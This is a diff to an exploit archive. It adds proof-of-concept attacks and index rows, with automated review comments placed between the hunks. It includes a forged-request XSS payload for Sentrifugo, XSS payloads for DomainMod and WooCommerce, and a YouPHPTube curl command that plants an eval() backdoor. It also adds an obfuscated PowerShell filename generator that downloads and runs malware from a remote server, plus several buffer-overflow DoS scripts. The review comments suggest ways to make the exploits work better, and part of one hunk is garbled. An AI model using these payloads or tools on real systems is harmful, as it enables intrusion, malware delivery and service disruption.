+ +---------------------------------------------------------------------------------------------------- + +function execute() +{ + var nuri ="http://10.42.1.42/sentrifugo/index.php/employee/add"; + xhttp = new XMLHttpRequest(); + xhttp.open("POST", nuri, true); + xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + xhttp.withCredentials = "true"; + var body = ""; + body += "\r\n\r\n"; + body += + "id=&final_emp_id=EMPP99&tmp_emp_name=Select+Candidate&employeeId=EMPP&employeeNumId=99" + + "&firstname=Bob&lastname=Blah&modeofentry=Direct&emprole=2_1&emailaddress=bob%40localhost.com" + + "&businessunit_id=0&reporting_manager=2&emp_status_id=6&screenflag=add&date_of_joining=07%2F04%2F2019&submit=Save"; + xhttp.send(body); + return true; +} + +execute(); + +---------------------------------------------------------------------------------------------------- + +When a user with permissions to add users (HR role by default) views your XSS "Certification Description" the add user request should be sent. + +Other session riding request that can possibly be crafted: +- Company Announcement - gets blasted out to all users. Also has an additional XSS vuln in the description. +- Add Employee Leave - this one is tricky to craft due to needed parameter knowledge. +- Background check - update or add employee background check status. +- Disciplinary Actions - manipulate existent or non-existent disciplinary records. \ No newline at end of file diff --git a/exploits/php/webapps/47325.txt b/exploits/php/webapps/47325.txt new file mode 100644 index 000000000..54bd600f3 --- /dev/null +++ b/exploits/php/webapps/47325.txt 
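Review bot: In `add-admin-user.js` the body is built as `body += "\r\n\r\n";` before the URL-encoded fields, so the first parameter goes on the wire with the key `\r\n\r\nid` rather than `id`; the request only works because `id` is empty anyway, and the two CRLFs should be dropped. `xhttp.withCredentials = "true";` assigns a string where the property is a boolean; it is truthy so the session cookie is still sent, but `xhttp.withCredentials = true;` is the correct form. The stored payload for the "Certificate Description" field is missing between the two blank lines of the PoC (presumably a `<script src=...>` tag lost in rendering), so the text should show the injected tag with the angle brackets escaped, as the write-up cannot be reproduced without it.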
@@ -0,0 +1,19 @@
+# Exploit Title: DomainMod <= 4.13 - Cross-Site Scripting
+# Date: 30 August 2019
+# Exploit Author: Damian Ebelties (https://zerodays.lol/)
+# Vendor Homepage: https://domainmod.org/
+# Version: <= 4.13
+# Tested on: Ubuntu 18.04.1
+# CVE: CVE-2019-15811
+
+The software 'DomainMOD' is vulnerable for Cross-Site Scripting in the
+file '/reporting/domains/cost-by-month.php' in the parameter 'daterange'.
+
+As of today (30 August 2019) this issue is unfixed.
+
+Almost all other files that use the parameter 'daterange' are vulnerable.
+See: https://github.com/domainmod/domainmod/tree/master/reporting/domains
+
+Proof-of-Concept:
+
+ https://domain.tld/reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(1)%22autofocus=%22
\ No newline at end of file
diff --git a/exploits/php/webapps/47326.txt b/exploits/php/webapps/47326.txt
new file mode 100644
index 000000000..57ab65715
--- /dev/null
+++ b/exploits/php/webapps/47326.txt
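Review bot: The advisory gives no remediation; the payload `%22onfocus=%22alert(1)%22autofocus=%22` closes a double-quoted attribute, which implies `daterange` is echoed into an HTML attribute value unencoded, so the fix worth stating is to wrap the echo in `htmlspecialchars($_GET['daterange'], ENT_QUOTES, 'UTF-8')` and, better, validate the value against the expected date-range format before it is used at all. "Almost all other files that use the parameter 'daterange' are vulnerable" is too vague for triage; either list the affected files under `reporting/domains/` or state the rule, e.g. `every reporting/domains/*.php that echoes daterange back into value="..." is affected`. A pointer to the upstream issue or fix commit should be added once one exists, since the "unfixed" line will otherwise go stale without notice.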
@@ -0,0 +1,23 @@
+# Exploit Title: YouPHPTube <= 7.4 - Remote Code Execution
+# Google Dork: intext:"Powered by YouPHPTube"
+# Date: 29 August 2019
+# Exploit Author: Damian Ebelties (https://zerodays.lol/)
+# Vendor Homepage: https://www.youphptube.com/
+# Version: <= 7.4
+# Tested on: Ubuntu 18.04.1
+
+YouPHPTube before 7.5 does no checks at all if you wanna generate a new
+config file. We can use this to generate our own config file with our
+own (malicious) code.
+
+All you need is a MySQL server that allows remote connections.
+
+Fixed by the following commit:
+
+ https://github.com/YouPHPTube/YouPHPTube/commit/b32b410c9191c3c5db888514c29d7921f124d883
+
+Proof-of-Concept:
+
+ # Run this command (with your own data replaced)
+ # Then visit https://domain.tld/?zerodayslol=phpinfo() for code execution!
+ curl -s "https://domain.tld/install/checkConfiguration.php" --data "contactEmail=rce@zerodays.lol&createTables=2&mainLanguage=RCE&salt=';eval(\$_REQUEST['zerodayslol']);echo '&systemAdminPass=zerodays.LOL&systemRootPath=./&webSiteRootURL=&webSiteTitle=Zerodays.lol&databaseHost=&databaseName=&databasePass=&databasePort=&databaseUser="
\ No newline at end of file
diff --git a/exploits/php/webapps/47327.txt b/exploits/php/webapps/47327.txt
new file mode 100644
index 000000000..683008d6f
--- /dev/null
+++ b/exploits/php/webapps/47327.txt
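Review bot: The curl command leaves `databaseHost`, `databaseName`, `databaseUser`, `databasePass` and `databasePort` empty while the text says a remotely reachable MySQL server is required, so as written the request will presumably fail the connection check before any config file is written; the placeholders should be explicit, e.g. `databaseHost=<attacker-mysql>&databaseUser=<user>&databasePass=<pass>&databasePort=3306`. The payload overwrites the target's configuration file with an `eval($_REQUEST['zerodayslol'])` backdoor, which is destructive on a live site and leaves a persistent RCE for anyone who learns the parameter name, so a warning to run only against a test instance and to restore the original configuration afterwards belongs next to the command. A remediation line pointing at the cited fix commit and at removing or access-restricting `install/` after setup would complete the write-up.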
@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin WooCommerce Product Feed <= 2.2.18 - Cross-Site Scripting
+# Date: 30 August 2019
+# Exploit Author: Damian Ebelties (https://zerodays.lol/)
+# Vendor Homepage: https://wordpress.org/plugins/webappick-product-feed-for-woocommerce/
+# Version: <= 2.2.18
+# Tested on: Ubuntu 18.04.1
+# CVE: CVE-2019-1010124
+
+The WordPress plugin 'WooCommerce Product Feed' does not correctly sanitize user-input,
+which leads to Cross-Site Scripting in the Admin Panel.
+
+Since it is WordPress, it's fairly easy to get RCE with this XSS, by editing the theme
+files via (for example) XHR requests with included Javascript.
+
+Proof-of-Concept:
+
+ https://domain.tld/wp-admin/admin.php?page=woo_feed_manage_feed&link=%3E%3Cscript%3Ealert`zerodays.lol`;%3C/script%3E
\ No newline at end of file
diff --git a/exploits/windows/dos/47248.py b/exploits/windows/dos/47248.py
index 8c6687d27..3ffe4e220 100755
--- a/exploits/windows/dos/47248.py
+++ b/exploits/windows/dos/47248.py
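Review bot: The PoC is a reflected XSS through the `link` parameter of `admin.php?page=woo_feed_manage_feed`, which only fires when a logged-in user who can reach that plugin page opens the attacker's URL; the write-up should say so, e.g. `Preconditions: authenticated victim with access to the plugin's feed page; payload delivered by link`, since the title and summary read as if the vector were unauthenticated. The escalation to RCE via the theme editor additionally requires the victim to be able to edit theme files (administrator with `DISALLOW_FILE_EDIT` not set), which is worth stating as a caveat rather than "fairly easy". The payload calls `alert` with a tagged template literal (backticks) instead of parentheses; a short note that this is a filter-evasion choice would help readers adapting it.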
@@ -73,45 +73,318 @@ Note: User interaction is required, and obviously running any random PS script i ''' from base64 import b64encode -import argparse,sys -#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC -#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. -#Expects hostname/ip-addr of web-server housing the exploit. -#By hyp3rlinx +from base64 import b64decode +from socket import * +import argparse,sys,socket,struct,re + +#GGPowerShell +#Microsoft Windows PowerShell - Unsantized Filename RCE Dirty File Creat0r. +# +#Original advisory: +#http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt +# +#Original PoC: +#https://www.youtube.com/watch?v=AH33RW9g8J4 +# +#By John Page (aka hyp3rlinx) #Apparition Security -#==================== +#========================= +#Features added to the original advisory script: +# +#Original script may have issues with -O for save files with certain PS versions, so now uses -OutFile. +# +#Added: server port option (Base64 mode only) +# +#Added: -z Reverse String Command as an alternative to default Base64 encoding obfuscation. +#Example self reversing payload to save and execute a file "n.js" from 127.0.0.1 port 80 is only 66 bytes. +# +#$a='sj.n trats;sj.n eliFtuO- 1.0.0.721 rwi'[-1..-38]-join'';iex $a +# +#-z payload requires a forced malware download on server-side, defaults port 80 and expects an ip-address. +# +#Added: IP to Integer for extra evasion - e.g 127.0.0.1 = 2130706433 +# +#Added: Prefix whitespace - attempt to hide the filename payload by push it to the end of the filename. +# +#Since we have space limit, malware names should try be 5 chars max e.g. 'a.exe' including the ext to make room for +#IP/Host/Port and whitespace especially when Base64 encoding, for reverse command string option we have more room to play. +#e.g. 
a.exe or n.js (1 char for the name plus 2 to 3 chars for ext plus the dot). +# +#All in the name of the dirty PS filename. +#========================================= + +BANNER=''' + ________________ _____ __ _____ __ __ + / ____/ ____/ __ \____ _ _____ _____/ ___// /_ |__ // / / / + / / __/ / __/ /_/ / __ \ | /| / / _ \/ ___/\__ \/ __ \ /_ -i flag, force-download or omit whitespace." def parse_args(): - parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") - parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") - parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.") + parser.add_argument("-s", "--server", help="Server to download malware from.") + parser.add_argument("-p", "--port", help="Malware server port, defaults 80.") + parser.add_argument("-m", "--locf", help="Name for the Malware upon download.") + parser.add_argument("-r", "--remf", nargs="?", help="Malware to download from the remote server.") + parser.add_argument("-f", "--force_download", nargs="?", const="1", help="No malware name specified, malwares force downloaded from the server web-root, malware type must be known up front.") + parser.add_argument("-z", "--rev_str_cmd", nargs="?", const="1", help="Reverse string command obfuscation Base64 alternative, ip-address and port 80 only, Malware must be force downloaded on the server-side, see -e.") + parser.add_argument("-w", "--wspace", help="Amount of whitespace to use for added obfuscation, Base64 is set for 2 bytes.") + parser.add_argument("-i", "--ipevade", nargs="?", const="1", help="Use the integer value of the malware servers IP address for obfuscation/evasion.") + parser.add_argument("-e", "--example", nargs="?", const="1", help="Show example use cases") return parser.parse_args() -def main(args): - PSEmbedFilenameMalwr="" - if args.ipaddress: - PSEmbedFilenameMalwr = "powershell iwr 
"+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name - return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')) -def create_file(payload): - f=open("Test;PowerShell -e "+payload+";2.ps1", "w") - f.write("Write-Output 'Have a nice day!'") - f.close() +#self reverse PS commands +def rev_str_command(args): + malware=args.locf[::-1] + revload=malware + revload+=" trats;" + revload+=malware + revload+=" eliFtuO- " + revload+=args.server[::-1] + revload+=" rwi" -if __name__=="__main__": + payload = "$a='" + payload+=malware + payload+=" trats;" + payload+=malware + payload+=" eliFtuO- " + payload+=args.server[::-1] + payload+=" rwi'[-1..-"+str(len(revload)) + payload+="]-join '';iex $a" + return payload + + +def ip2int(addr): + return struct.unpack("!I", inet_aton(addr))[0] + + +def ip2hex(ip): + x = ip.split('.') + return '0x{:02X}{:02X}{:02X}{:02X}'.format(*map(int, x)) + + +def obfuscate_ip(target): + IPHex = ip2hex(target) + return str(ip2int(IPHex)) + + +def decodeB64(p): + return b64decode(p) + + +def validIP(host): + try: + socket.inet_aton(host) + return True + except socket.error: + return False - parser = argparse.ArgumentParser() - PSCmds = main(parse_args()) +def filename_sz(space,cmds,mode): + if mode==0: + return len(FILENAME_PREFIX)+len(space)+ 1 +len(POWERSHELL_OBFUSCATED)+ 4 + len(cmds)+ len(";.ps1") + else: + return len(FILENAME_PREFIX) + len(space) + 1 + len(cmds) + len(";.ps1") + + +def check_filename_size(sz): + if sz > MAX_CHARS: + print "Filename is", sz, "chars of max allowed", MAX_CHARS + print WARN_MSG + return False + return True + + +def create_file(payload, args): + try: + f=open(payload, "w") + f.write("Write-Output 'Have a good night!'") + f.close() + except Exception as e: + print "[!] File not created!" + print WARN_MSG + return False + return True + + +def cmd_info(t,p): + print "PAYLOAD: "+p + if t==0: + print "TYPE: Base64 encoded payload." 
+ else: + print "TYPE: Self Reversing String Command (must force-download the malware server side)." + + + +def main(args): + + global FILENAME_PREFIX + if len(sys.argv)==1: parser.print_help(sys.stderr) sys.exit(1) - - create_file(PSCmds) - print "PowerShell - Unsantized Filename Command Execution File created!" - print "By hyp3rlinx" + if args.example: + usage() + exit() + + sz=0 + space="" + b64payload="" + reverse_string_cmd="" + + if not validIP(args.server): + if not args.rev_str_cmd: + if args.server.find("http://")==-1: + args.server = "http://"+args.server + + if args.ipevade: + args.server = args.server.replace("http://", "") + if validIP(args.server): + args.server = obfuscate_ip(args.server) + else: + print "[!] -i (IP evasion) requires a valid IP address, see Help -h." + exit() + + if not args.locf: + print "[!] Missing local malware save name -m flag see Help -h." + exit() + + if not args.rev_str_cmd: + + if not args.remf and not args.force_download: + print "[!] No remote malware specified, force downloading are we? use -f or -r flag, see Help -h." + exit() + + if args.remf and args.force_download: + print "[!] Multiple download options specified, use -r or -f exclusively, see Help -h." + exit() + + if args.force_download: + args.remf="" + + if args.remf: + #remote file can be extension-less + if not re.findall("^[~\w,a-zA-Z0-9]$", args.remf) and not re.findall("^[~\w,\s-]+\.[A-Za-z0-9]{2,3}$", args.remf): + print "[!] Invalid remote malware name specified, see Help -h." + exit() + + #local file extension is required + if not re.findall("^[~\w,\s-]+\.[A-Za-z0-9]{2,3}$", args.locf): + print "[!] Local malware name "+args.locf+" invalid, must contain no paths and have the correct extension." + exit() + + if not args.port: + args.port = DEFAULT_PORT + + if args.wspace: + args.wspace = int(args.wspace) + space="--IAA="*DEFAULT_BASE64_WSPACE_LEN + if args.wspace != DEFAULT_BASE64_WSPACE_LEN: + print "[!] 
Ignoring", args.wspace, "whitespace amount, Base64 default is two bytes" + + filename_cmd = "powershell iwr " + filename_cmd+=args.server + filename_cmd+=":" + filename_cmd+=args.port + filename_cmd+="/" + filename_cmd+=args.remf + filename_cmd+=" -OutFile " + filename_cmd+=args.locf + filename_cmd+=" ;sleep -s 2;start " + filename_cmd+=args.locf + + b64payload = b64encode(filename_cmd.encode('UTF-16LE')) + sz = filename_sz(space, b64payload, 0) + + FILENAME_PREFIX+=space + FILENAME_PREFIX+=";" + FILENAME_PREFIX+=POWERSHELL_OBFUSCATED + FILENAME_PREFIX+=" -e " + FILENAME_PREFIX+=b64payload + FILENAME_PREFIX+=";.ps1" + COMMANDS = FILENAME_PREFIX + + else: + + if args.server.find("http://")!=-1: + args.server = args.server.replace("http://","") + + if args.force_download: + print "[!] Ignored -f as forced download is already required with -z flag." + + if args.wspace: + space=" "*int(args.wspace) + + if args.remf: + print "[!] Using both -z and -r flags is disallowed, see Help -h." + exit() + + if args.port: + print "[!] -z flag must use port 80 as its default, see Help -h." + exit() + + if not re.findall("^[~\w,\s-]+\.[A-Za-z0-9]{2,3}$", args.locf): + print "[!] Local Malware name invalid -m flag." + exit() + + reverse_string_cmd = rev_str_command(args) + sz = filename_sz(space, reverse_string_cmd, 1) + + FILENAME_PREFIX+=space + FILENAME_PREFIX+=";" + FILENAME_PREFIX+=reverse_string_cmd + FILENAME_PREFIX+=";.ps1" + COMMANDS=FILENAME_PREFIX + + if check_filename_size(sz): + if create_file(COMMANDS,args): + if not args.rev_str_cmd: + cmd_info(0,decodeB64(b64payload)) + else: + cmd_info(1,reverse_string_cmd) + return sz + + return False + + +def usage(): + print "(-r) -s -p 5555 -m g.js -r n.js -i -w 2" + print " Whitespace, IP evasion, download, save and exec malware via Base64 encoded payload.\n" + print " Download an save malware simply named '2' via port 80, rename to f.exe and execute." 
+ print " -s -m a.exe -r 2\n" + print "(-f) -s -f -m d.exe" + print " Expects force download from the servers web-root, malware type must be known upfront.\n" + print "(-z) -s 192.168.1.10 -z -m q.cpl -w 150" + print " Reverse string PowerShell command alternative to Base64 obfuscation" + print " uses self reversing string of PS commands, malware type must be known upfront." + print " Defaults port 80, ip-address only and requires server-side forced download from web-root.\n" + print "(-i) -s 192.168.1.10 -i -z -m ~.vbs -w 100" + print " Reverse string command with (-i) IP as integer value for evasion.\n" + print " Base64 is the default command obfuscation encoding, unless -z flags specified." + +if __name__=="__main__": + + print BANNER + parser = argparse.ArgumentParser() + sz = main(parse_args()) + + if sz: + print "DIRTY FILENAME SIZE: %s" % (sz) +"\n" + print "PowerShell Unsantized Filename RCE file created." ''' [POC Video URL] https://www.youtube.com/watch?v=AH33RW9g8J4 diff --git a/exploits/windows/dos/47318.py b/exploits/windows/dos/47318.py new file mode 100755 index 000000000..033ca8e82 --- /dev/null +++ b/exploits/windows/dos/47318.py 
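Review bot: `create_file` binds the caught exception as `e` and the second parameter as `args` but uses neither, so when the file cannot be written the caller only sees the generic warning and the cause is lost; `except (IOError, OSError) as e:` with `print "[!] File not created: %s" % e` keeps the best-effort behaviour and still reports why, and the unused `args` parameter can be dropped or documented. `parse_args` calls `add_argument` on a `parser` that is a module global created only under `__main__`, which works for the script but deserves a one-line comment so the next reader does not search for a definition. `FILENAME_PREFIX`, `MAX_CHARS`, `WARN_MSG` and `BANNER` are referenced in the new functions but their definitions fall in the stretch of this hunk that is garbled in this view, so their values could not be checked here.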
@@ -0,0 +1,26 @@
+#Exploit Title: SQL Server Password Changer v1.90 Denial of Service Exploit
+# Date: 29.08.2019
+# Vendor Homepage:https://www.top-password.com/
+# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)
+# Tested Version: v2.10
+# Tested on: Windows 8 x64
+# Windows 7 x64
+
+
+# 1.- Run python code :Outlook Password Recovery.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open SQL Server Password Changer and Click 'EnterKey'
+# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
+# 5.- Click 'OK' and you will see a crash.
+
+#!/usr/bin/env python
+buffer = "x41" * 6000
+
+try:
+f=open("Evil.txt","w")
+print "[+] Creating %s bytes evil payload.." %len(buffer)
+f.write(buffer)
+f.close()
+print "[+] File created!"
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47319.py b/exploits/windows/dos/47319.py
new file mode 100755
index 000000000..e2a832d72
--- /dev/null
+++ b/exploits/windows/dos/47319.py
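Review bot: The header contradicts itself: the title names v1.90, `# Tested Version:` says v2.10, and step 1 tells the reader to run `Outlook Password Recovery.py`, which is the name of a different advisory (47309 in the index rows below) rather than this file. One consistent version and `# 1.- Run this python script` would fix it, and this matters because the index row for 47318 in this commit appears to be derived from the title. The bare `except:` also hides the reason the file could not be written; `except IOError as e:` with `e` in the message keeps the best-effort behaviour and still says why. The `print` statements make this Python 2 only, which the steps do not mention.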
@@ -0,0 +1,71 @@
+#!/usr/bin/python
+
+# SWAMI KARUPASAMI THUNAI
+
+
+
+print("""
+
+############################################################################
+###
+
+# Exploit Title: Easy MP3 Downloader Denial of Service
+
+# Date: 2019-08-29
+
+# Exploit Author: Mohan Ravichandran & Snazzy Sanoj
+
+# Organization : StrongBox IT
+
+# Vulnerable Software: Easy MP3 Downloader
+
+# Version: 4.7.8.8
+
+# Software Link:
+https://download.cnet.com/Easy-MP3-Downloader/3000-2141_4-10860695.html
+
+# Tested On: Windows 10
+
+#
+
+# Credit to Snazzy Sanoj & Meshach for discovering the Vulnerbility
+
+# Vulnerability Disclosure Date : 2019-08-29
+
+#
+
+# Manual steps to reproduce the vulnerability ...
+
+#1. Download and install the setup file
+
+#2. Run this exploit code via python 2.7
+
+#3. A file "exploit.txt" will be created
+
+#4. Copy the contents of the file
+
+#5. While launching the application select Enter SN
+
+#6. Enter random string and press Ok
+
+#7. Then select manual option
+
+#8. Then Copy the contents of the exploit.txt and paste on the Unlock Code
+field
+
+#9. Click Ok and voila ! :P Application crashes
+
+############################################################################
+###
+
+""")
+
+
+
+file = open("exploit.txt","wb")
+
+junk = "A" * 6000
+
+file.write(junk)
+
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/47322.py b/exploits/windows/dos/47322.py
new file mode 100755
index 000000000..ec43bc71e
--- /dev/null
+++ b/exploits/windows/dos/47322.py
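Review bot: All the exploit-db header fields (Title, Date, Author, Version, Software Link, the reproduction steps) sit inside the `print("""...""")` string rather than as `#` comment lines at the top of the file, so anything that reads the header from leading comments would miss them, and the blank line after every field doubles the file for no gain. Moving the fields into a conventional comment header and keeping only a short banner in the print is a style-only change. Two wording points: `Vulnerbility` -> `Vulnerability`, and `# Date: 2019-08-29` disagrees with the 2019-08-30 date the index row for 47319 in this commit gives.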
@@ -0,0 +1,24 @@
+#!/usr/bin/python
+# Exploit Title: Asus Precision TouchPad 11.0.0.25 - DoS/Privesc
+# Date: 29-08-2019
+# Exploit Author: Athanasios Tserpelis of Telspace Systems
+# Vendor Homepage: https://www.asus.com
+# Version: 11.0.0.25
+# Software Link : https://www.asus.com
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows 10 RS5 x64
+# CVE: CVE-2019-10709
+
+from ctypes import *
+kernel32 = windll.kernel32
+ntdll = windll.ntdll
+NULL = 0
+hevDevice = kernel32.CreateFileA("\\\\.\\AsusTP", 0xC0000000, 0, None, 0x3, 0, None)
+if not hevDevice or hevDevice == -1:
+ print "*** Couldn't get Device Driver handle."
+ sys.exit(0)
+
+buf = "A"*12048
+raw_input("Press Enter to Trigger Vuln")
+kernel32.DeviceIoControl(hevDevice, 0x221408, buf, 0x1, buf, 0x1 , 0, NULL)
\ No newline at end of file
diff --git a/exploits/windows/dos/47328.py b/exploits/windows/dos/47328.py
new file mode 100755
index 000000000..dc64d2e8d
--- /dev/null
+++ b/exploits/windows/dos/47328.py
@@ -0,0 +1,28 @@
+# Exploit Title: VX Search Enterprise v10.4.16 DoS
+# Google Dork: N/A
+# Date: 17.01.2018
+# Exploit Author: James Chamberlain [chumb0]
+# Vendor Homepage: http://www.vxsearch.com/downloads.html
+# Software Link: http://www.vxsearch.com/setups/vxsearchent_setup_v10.4.16.exe
+# Version: v10.4.16
+# Tested on: Windows 7 Home x86
+# CVE : N/A
+
+# Have been unable to overwrite SEH/EIP, but the crash serves as an unauthenticated DoS.
+
+# Replication - Large buffer sent in the majority of Request Headers. PoC attached. Server needs http enabling (non default)
+
+ #!/usr/bin/python
+import socket
+
+pwnd = "A" * 5000
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(('192.168.50.133', 80))
+buf = ""
+buf += "GET / HTTP/1.1" + "\r\n"
+buf += "Host: 192.168.50.133\r\n"
+buf += "User-Agent: " + pwnd + "r\n"
+buf += "\r\n\r\n"
+s.send(buf)
+s.close()
\ No newline at end of file
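Review bot: The failure branch calls `sys.exit(0)` but `sys` is never imported (`from ctypes import *` does not bring it in), so a missing or inaccessible device handle ends in a NameError rather than the intended message and clean exit; `import sys` next to the ctypes import fixes it. `ntdll = windll.ntdll` is assigned and never used. The title says `DoS/Privesc` while the index row for 47322 in this commit records only a Denial of Service; if the script does not demonstrate privilege escalation the title should drop it, otherwise the header should say what is escalated.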
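Review bot: `buf += "User-Agent: " + pwnd + "r\n"` is missing the backslash before `r`, so that header ends in a literal `r` followed by `\n` instead of the `\r\n` the other lines use; presumably `"\r\n"` was intended. `connect=s.connect(...)` stores a value that is always `None`, and the address `192.168.50.133` is written twice (the connect call and the Host header), so a single variable used in both places would read better. `# Date: 17.01.2018` disagrees with the 2019-08-30 date the index row for 47328 in this commit gives, and the `Server needs http enabling (non default)` precondition belongs in a header field of its own so the exposure condition is visible at a glance.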
diff --git a/files_exploits.csv b/files_exploits.csv
index 027651e0b..5021a92a8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6553,6 +6553,10 @@ id,file,description,date,author,type,platform,port
 47285,exploits/windows/dos/47285.py,"RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service",2019-08-19,Achilles,dos,windows,
 47309,exploits/windows/dos/47309.py,"Outlook Password Recovery 2.10 - Denial of Service",2019-08-28,"Velayutham Selvaraj_ Praveen Thiyagarayam",dos,windows,
 47316,exploits/multiple/dos/47316.txt,"Webkit JSC: JIT - Uninitialized Variable Access in ArgumentsEliminationPhase::transform",2019-08-29,"Google Security Research",dos,multiple,
+47318,exploits/windows/dos/47318.py,"SQL Server Password Changer 1.90 - Denial of Service",2019-08-30,"Velayutham Selvaraj_ Praveen Thiyagarayam",dos,windows,
+47319,exploits/windows/dos/47319.py,"Easy MP3 Downloader 4.7.8.8 - 'Unlock Code' Denial of Service",2019-08-30,"Mohan Ravichandran_ Snazzy Sanoj",dos,windows,
+47322,exploits/windows/dos/47322.py,"Asus Precision TouchPad 11.0.0.25 - Denial of Service",2019-08-30,"Athanasios Tserpelis",dos,windows,
+47328,exploits/windows/dos/47328.py,"VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service",2019-08-30,"James Chamberlain",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10665,6 +10669,7 @@ id,file,description,date,author,type,platform,port
 47258,exploits/windows/local/47258.txt,"Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities",2019-08-15,"Google Security Research",local,windows,
 47306,exploits/windows/local/47306.txt,"Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass",2019-08-26,"Google Security Research",local,windows,
 47307,exploits/linux/local/47307.rb,"Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)",2019-08-26,Metasploit,local,linux,
+47321,exploits/android/local/47321.txt,"Canon PRINT 2.5.5 - Information Disclosure",2019-08-30,0x48piraj,local,android,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17642,6 +17647,7 @@ id,file,description,date,author,type,platform,port
 47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php,
 47298,exploits/multiple/remote/47298.rb,"LibreOffice < 6.2.6 Macro - Python Code Execution (Metasploit)",2019-08-21,LoadLow,remote,multiple,
 47313,exploits/multiple/remote/47313.txt,"Cisco UCS Director_ Cisco Integrated Management Controller Supervisor and Cisco UCS Director Express for Big Data - Multiple Vulnerabilities",2019-08-21,"Pedro Ribeiro",remote,multiple,
+47320,exploits/linux/remote/47320.c,"QEMU - Denial of Service",2019-08-20,vishnudevtj,remote,linux,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41673,3 +41679,8 @@ id,file,description,date,author,type,platform,port
 47312,exploits/php/webapps/47312.html,"WordPress Plugin GoURL.io < 1.4.14 - File Upload",2018-10-31,"Pouya Darabi",webapps,php,
 47314,exploits/php/webapps/47314.sh,"Jobberbase 2.0 - 'subscribe' SQL Injection",2019-08-29,"Damian Ebelties",webapps,php,80
 47315,exploits/php/webapps/47315.txt,"PilusCart 1.4.1 - Local File Disclosure",2019-08-29,"Damian Ebelties",webapps,php,80
+47323,exploits/php/webapps/47323.txt,"Sentrifugo 3.2 - File Upload Restriction Bypass",2019-08-30,creosote,webapps,php,80
+47324,exploits/php/webapps/47324.txt,"Sentrifugo 3.2 - Persistent Cross-Site Scripting",2019-08-30,creosote,webapps,php,80
+47325,exploits/php/webapps/47325.txt,"DomainMod 4.13 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,
+47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80
+47327,exploits/php/webapps/47327.txt,"WordPress Plugin WooCommerce Product Feed 2.2.18 - Cross-Site Scripting",2019-08-30,"Damian Ebelties",webapps,php,80